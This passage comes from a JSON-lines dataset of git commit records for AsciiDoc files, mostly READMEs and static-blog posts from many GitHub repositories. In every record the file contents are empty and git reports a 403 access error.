403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e424735d30097976f36971ad814c360e395e7c4","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea2f0f7e964e349799eeee388dc22d957c59267a","subject":"Update 2016-02-05-These-parks-are-made-for-walking.adoc","message":"Update 2016-02-05-These-parks-are-made-for-walking.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-05-These-parks-are-made-for-walking.adoc","new_file":"_posts\/2016-02-05-These-parks-are-made-for-walking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63c887ba240d9811cd09d1dbf231f5612356d5f3","subject":"y2b create post Does It Suck? - $15 Bluetooth Beanie","message":"y2b create post Does It Suck? - $15 Bluetooth Beanie","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-26-Does-It-Suck--15-Bluetooth-Beanie.adoc","new_file":"_posts\/2016-02-26-Does-It-Suck--15-Bluetooth-Beanie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d80cb80d7c8924ef3709dcaaefa76096ae7fe133","subject":"y2b create post The Best Sounding Smartphone Ever?","message":"y2b create post The Best Sounding Smartphone Ever?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-27-The-Best-Sounding-Smartphone-Ever.adoc","new_file":"_posts\/2016-07-27-The-Best-Sounding-Smartphone-Ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cf66687a775b0963d9f00addfb90e1581fc66e6","subject":"Resize image test","message":"Resize image test\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1754b9b316c7f2b906441aa9546a84b114650ac","subject":"Removed 'documentation' badge","message":"Removed 'documentation' badge\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05e4c617bb3f1d7af9e284b053ac9b2087938492","subject":"Update 2016-09-16-Byteman-now-available-in-homebrew.adoc","message":"Update 2016-09-16-Byteman-now-available-in-homebrew.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-09-16-Byteman-now-available-in-homebrew.adoc","new_file":"_posts\/2016-09-16-Byteman-now-available-in-homebrew.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26cb6bc442da6782e1e13e6bd392e8a442e8dd26","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c89810a761f3d03b0480883a3084b668cdcc7476","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23f4c0636f350a92bb567f057fc56d9a54dc47f9","subject":"y2b create post Switching To The iPhone 7 Plus...","message":"y2b create post Switching To The iPhone 7 Plus...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-20-Switching-To-The-iPhone-7-Plus.adoc","new_file":"_posts\/2016-09-20-Switching-To-The-iPhone-7-Plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52c0067d5abee2a56a98144a12bcaec13fdad4d2","subject":"Update 2017-05-25-Make-your-old-game-Great-Again.adoc","message":"Update 2017-05-25-Make-your-old-game-Great-Again.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-05-25-Make-your-old-game-Great-Again.adoc","new_file":"_posts\/2017-05-25-Make-your-old-game-Great-Again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0ce90145ebd403e1f8ba4776b2d3ac93dd5dd24","subject":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96ba175b8e464a8606cebcae6f9ed96b9b71531a","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3213c33a8ff9311f05b57f04f7bbfbae10da21dc","subject":"Updated credits","message":"Updated credits\n","repos":"aucampia\/dnspod-int-py","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aucampia\/dnspod-int-py.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e85871cfe9d46ef31061396392a3530635ab1711","subject":"Update cross-cluster-search.asciidoc","message":"Update cross-cluster-search.asciidoc\n\nIncreased the required min version of CCS in the docs to 5.5\n","repos":"markwalkom\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,vroyer\/elassandra,mohit\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,wenpos\/elasticsearch,jimczi\/elasticsearch,sneivandt\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,jimczi\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,pozhidaevak\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,masaruh\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,robin13\/elasticsearch,wenpos\/elasticsearch,vroyer\/elasticassandra,markwalkom\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,scottsom\/elasticsearch,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,jimczi\/elasticsearch,rajanm\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,vroyer\/elasticassandra,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,lks21c\/elasticsearch,mohit\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch,fred84\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,vroyer\/elassandra,umeshdangat\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch","old_file":"docs\/reference\/modules\/cross-cluster-search.asciidoc","new_file":"docs\/reference\/modules\/cross-cluster-search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9c5a3111c90de376e6079a3549f51f4f054335d","subject":"Update 2016-10-18-Hello.adoc","message":"Update 2016-10-18-Hello.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2016-10-18-Hello.adoc","new_file":"_posts\/2016-10-18-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea591afc225595e8fc71c4c28bf60595c405f36a","subject":"Update 2018-10-21-O-P-P.adoc","message":"Update 2018-10-21-O-P-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-21-O-P-P.adoc","new_file":"_posts\/2018-10-21-O-P-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c221fc3799e2477ba243a8e6f5384043a8c50187","subject":"y2b create post Enable Desktop Web Browsing For Android Honeycomb","message":"y2b create post Enable Desktop Web Browsing For Android Honeycomb","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-07-Enable-Desktop-Web-Browsing-For-Android-Honeycomb.adoc","new_file":"_posts\/2011-07-07-Enable-Desktop-Web-Browsing-For-Android-Honeycomb.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd2eb4a7119c5ec58633d922afe16060d1053e7c","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c82423227df4b58dfc99f66f06ccb0538147a4f","subject":"Updated Travis badge to svg [skip ci]","message":"Updated Travis badge to svg [skip ci]","repos":"sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81853a37fb4f6861220c727c967977797e02a71c","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"65e809bb2323ea1ad58e10a021894578e78f22b3","subject":"Added link to FAQ","message":"Added link to FAQ","repos":"wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a05538e0384cc9f4be525904b106ec8913e136db","subject":"Fix openstack command in README","message":"Fix openstack command in README\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f67dc65b216c2d2af13e29657ae3d8b2ab31c9c","subject":"Create README.adoc","message":"Create README.adoc","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd421c0ddae096d7705e597a5224b361900d1b0e","subject":"README.adoc","message":"README.adoc\n\nSigned-off-by: Thomas Sj\u00f6gren <9ff28d1cb1d19283ed3327b40df6c7d62d8bc343@users.noreply.github.com>\n","repos":"konstruktoid\/hardening,konstruktoid\/hardening","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/konstruktoid\/hardening.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"debb2d7e9e9f3c0ca14849ac105947efe6356acd","subject":"Fix @pfalcon comments","message":"Fix @pfalcon comments","repos":"pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd415bb92ffcd61ee0bda43c2b92285a4c8623e5","subject":"Create README.adoc","message":"Create README.adoc","repos":"burmanm\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,mwringe\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,ppalaga\/hawkular-metrics,ppalaga\/hawkular-metrics,Jiri-Kremser\/hawkular-metrics,vrockai\/hawkular-metrics,Jiri-Kremser\/hawkular-metrics,jshaughn\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,ppalaga\/hawkular-metrics,tsegismont\/hawkular-metrics,Jiri-Kremser\/hawkular-metrics,jshaughn\/hawkular-metrics,pilhuhn\/rhq-metrics,tsegismont\/hawkular-metrics,vrockai\/hawkular-metrics,pilhuhn\/rhq-metrics,vrockai\/hawkular-metrics,vrockai\/hawkular-metrics,mwringe\/hawkular-metrics,mwringe\/hawkular-metrics,Jiri-Kremser\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,jsanda\/hawkular-metrics,pilhuhn\/rhq-metrics,jotak\/hawkular-metrics,jsanda\/hawkular-metrics,jsanda\/hawkular-metrics,jotak\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,jsanda\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,140293816\/Hawkular-fork,vrockai\/hawkular-metrics,140293816\/Hawkular-fork,tsegismont\/hawkular-metrics,140293816\/Hawkular-fork,jsanda\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,Jiri-Kremser\/hawkular-metrics,spadgett\/hawkular-metrics,pilhuhn\/rhq-metrics,jshaughn\/hawkular-metrics,140293816\/Hawkular-fork,hawkular\/hawkular-metrics,jshaughn\/hawkular-metrics","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a744a26a1675a84a1ae22754758dbade823bcab8","subject":"Final 1.0","message":"Final 1.0","repos":"schnawel007\/jsEventBus","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/schnawel007\/jsEventBus.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7e4fa5635c0652e7d6a7f1ff3fd5939bb142ffb","subject":"update usage","message":"update usage\n","repos":"cranej\/scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cranej\/scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e009ea36298f178f1a7a6434219199dcd0d9c2d","subject":"Incorrect example in `README.adoc`","message":"Incorrect example in `README.adoc`\n\ns\/emerald::start(&addr, None);\/emerald::start(&addr, None, None);\/.\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"27ccf5dffe2b27442675e216f56be8a7fc75257f","subject":"Create README.adoc","message":"Create README.adoc","repos":"weghst\/setaria,weghst\/setaria","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/weghst\/setaria.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c017d6bef2e797e57001466036e345648f72c04c","subject":"Create README.adoc","message":"Create README.adoc","repos":"asciidoctor\/default-to-asciidoc-chrome-extension","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/default-to-asciidoc-chrome-extension.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09e46a7b833db3441f1b808824c66061d879f721","subject":"README\u3092\u66f8\u3044\u305f","message":"README\u3092\u66f8\u3044\u305f\n","repos":"matoken\/Chrome_cast","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/matoken\/Chrome_cast.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38688549d96aa434b35bd0cb4b4878fc130471d9","subject":"new README","message":"new README\n","repos":"ridgebacknet\/ridgeback-hunter-db","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ridgebacknet\/ridgeback-hunter-db.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a9a936357a683ed3eef97caed2136a099877bf3","subject":"feat: added documentation","message":"feat: added documentation\n","repos":"Kronos-Integration\/kronos-step","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-step.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"951198755610bf68b34f3abbdd537d59a158e01b","subject":"Added README.adoc symlink for GitHub.","message":"Added README.adoc symlink for GitHub.\n","repos":"moreati\/u2fval,Yubico\/u2fval","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moreati\/u2fval.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"049fcaf0b1bb787fde5ce170b6bc48963742975f","subject":"Added build status icon to readme","message":"Added build status icon to readme\n","repos":"sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"089f63399238993023aed7d7a092a38745c6deee","subject":"Trying to symlink README.adoc -> README.txt","message":"Trying to symlink README.adoc -> README.txt\n","repos":"ciarand\/exhausting-search-homework","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciarand\/exhausting-search-homework.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"1a2e7b7883b1e3e98dbd3dd52b8f83111953f2b6","subject":"Add the typical README","message":"Add the typical README\n","repos":"jenkinsci\/chucknorris-plugin,jenkinsci\/chucknorris-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/chucknorris-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1752ee8bc934f0c0448c454dabf0d02a5ee89d32","subject":"Deleted _posts\/2016-08-11-Test.adoc","message":"Deleted _posts\/2016-08-11-Test.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-08-11-Test.adoc","new_file":"_posts\/2016-08-11-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7da15e5ff858ba517e961da2d9c946846d07a3d3","subject":"Update 2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","message":"Update 2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2d1db63db89d0511998799c3c4d6fbeee9b2b36","subject":"y2b create post The Bizarre Pocket Chair - Does It Suck?","message":"y2b create post The Bizarre Pocket Chair - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-23-The-Bizarre-Pocket-Chair--Does-It-Suck.adoc","new_file":"_posts\/2016-11-23-The-Bizarre-Pocket-Chair--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0b2457df7e37dcf4e42289d84a0e9fd95b356ab","subject":"Update 2017-02-21-Tesing-Hub-Press.adoc","message":"Update 